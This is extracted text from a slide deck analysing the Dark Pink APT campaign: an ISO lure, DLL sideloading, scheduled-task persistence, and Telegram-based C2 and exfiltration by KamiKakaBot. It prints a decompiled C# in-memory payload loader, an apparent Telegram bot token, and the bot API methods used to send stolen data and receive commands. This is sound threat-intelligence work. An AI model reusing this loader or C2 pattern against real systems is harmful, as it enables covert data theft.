揭开Dark Pink的面纱——对APAC隐蔽的APT威胁的深入分析.pdf

1、Unveiling Dark Pink:An In-Depth Analysis of APACs Covert APT ThreatOUTLINEDark Pinks latest campaignTelegram Exfiltration and C2 demoTeleScoutDark Pinks TTPsI GOT AN EMAIL!(Group-IB,2023)ISO FILEISO FILESigned winword.exe sideloads wwlib.dllMalicious wwlib.dll sets up persistenceExtracts XOR encrypt

2、ed payload from.doc lureDisplays.doc lureSets up scheduled taskSCHEDULED TASKMicrosoft Build Task saved in Temp folderName wct*.tmp relates to normal OneDrive activity public static void main()string stealer_module=init_br();string Telegram_Chat_ID=Encoding.Default.GetString(chat_id_numbers);var inp

3、utStream=new MemoryStream(main_payload);ZipArchive archive=new ZipArchive(inputStream,ZipArchiveMode.Read);ZipArchiveEntry archEntry=archive.Entries0;Stream entryStream=archEntry.Open()var tmpMem=new MemoryStream();entryStream.CopyTo(tmpMem);var xtmp=tmpMem.ToArray();var memory_payload=Assembly.Load

4、(xtmp);byte Telegram_BOT_API_token=Convert.FromBase64String(0vHS+db60vvU+t6IpY+WpaKzh4WRsLyc0IGcgo26opyMv4y+r7yHsKj9lo23+Q=);foreach(Type type in memory_payload.GetExportedTypes()try var c=Activator.CreateInstance(type);type.InvokeMember(KaidnfAei,BindingFlags.InvokeMethod,null,c,new object Telegram

5、_BOT_API_token,Telegram_Chat_ID,stealer_module);catch continue;BUILD TASK6860236203:AAFrlFzcLuyXU4HxKisFUhvhwKucyL4rDS0TELEGRAM BOT APIUsed to communicate with bots in Telegram chatsHTTP-based interfaceFormat:https:/api.telegram.org/bot$token/$method?$paramsImportant methods:sendMessage?chat_id=&tex

6、t=:sends message to specified chatsendDocument?chat_id=&caption=:sends document to specified chatgetUpdates:Retrieves latest messages seen by the bot in Telegram chatsKAMIKAKABOT.NET executableSeparate.NET stealer moduleExecutes cmd.exe through/getUpdatesSends result back using/s